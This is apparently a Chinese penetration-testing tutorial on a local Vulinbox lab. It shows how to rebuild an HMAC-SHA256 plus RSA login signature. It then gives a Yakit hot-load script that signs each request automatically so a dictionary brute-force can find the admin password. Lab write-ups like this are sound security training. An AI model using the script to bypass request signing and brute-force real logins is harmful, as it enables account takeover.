渗透测试-前端验签绕过之SHA256+RSA

本文是高级前端加解密与验签实战的第2篇文章，本系列文章实验靶场为Yakit里自带的Vulinbox靶场，本文讲述的是绕过SHA256+RSA签名来爆破登录。

绕过

根据提示可以看出这次签名用了SHA2556和RSA两个技术进行加密。

查看源代码可以看到RSA公钥是通过请求服务器获取：

请求一下：http://127.0.0.1:8787/crypto/js/rsa/public/key ，可以看到公钥。

SHA256密钥位置：

Encrypt方法:

function Encrypt(word) {     console.info(word);     return  KEYUTIL.getKey(pubkey).encrypt(CryptoJS.HmacSHA256(word, key.toString(CryptoJS.enc.Utf8)).toString());  } 

KEYUTIL.getKey(pubkey).encrypt是RSA1v15加密方法，在代码中可以看到先进行SHA265加密，然后再RSA加密。被加密的文本的格式同上文所示。

使用CyberChef加密：

替换请求，可以看到签名构造成功：

热加载

这是我写的Yakit热加载代码，通过beforeRequest劫持请求包，使用encryptData函数进行加密，getPubkey获取公钥，最终实现热加载自动签名功能。

getPubkey = func() {     //通过请求动态获取公钥     rsp, req = poc.HTTP(`GET /crypto/js/rsa/public/key HTTP/1.1 Host: 127.0.0.1:8787      `)~     body = poc.GetHTTPPacketBody(rsp) // 响应体     return body }  encryptData = (packet) => {     body = poc.GetHTTPPacketBody(packet)     params = json.loads(body)     name = params.username     pass = params.password     key = "31323334313233343132333431323334"     pemBytes = getPubkey() // 获取公钥      signText = f`username=${name}&password=${pass}`     sha256sign = codec.EncodeToHex(codec.HmacSha256(f`${codec.DecodeHex(key)~}`, signText)) // SHA256加密     rsaSign = codec.EncodeToHex(codec.RSAEncryptWithPKCS1v15(pemBytes /*type: []byte*/, sha256sign)~) // RSA加密      body = f`{"username":"${name}","password":"${pass}","signature":"${rsaSign}","key":"${key}"}`     return string(poc.ReplaceBody(packet, body, false)) }   //发送到服务端修改数据包 // beforeRequest = func(req){ //     return encryptData(req) // }  //调试用 packet = <<<TEXT POST /crypto/sign/hmac/sha256/verify HTTP/1.1 Host: 127.0.0.1:8787 Content-Type: application/json Content-Length: 179  {"username":"admin","password":"password"} TEXT result = (encryptData(packet)) print(result) 

这次不调试了，直接请求看看效果，成功热加载自动签名：

插入临时字典爆破，可以看到正确密码为admin123。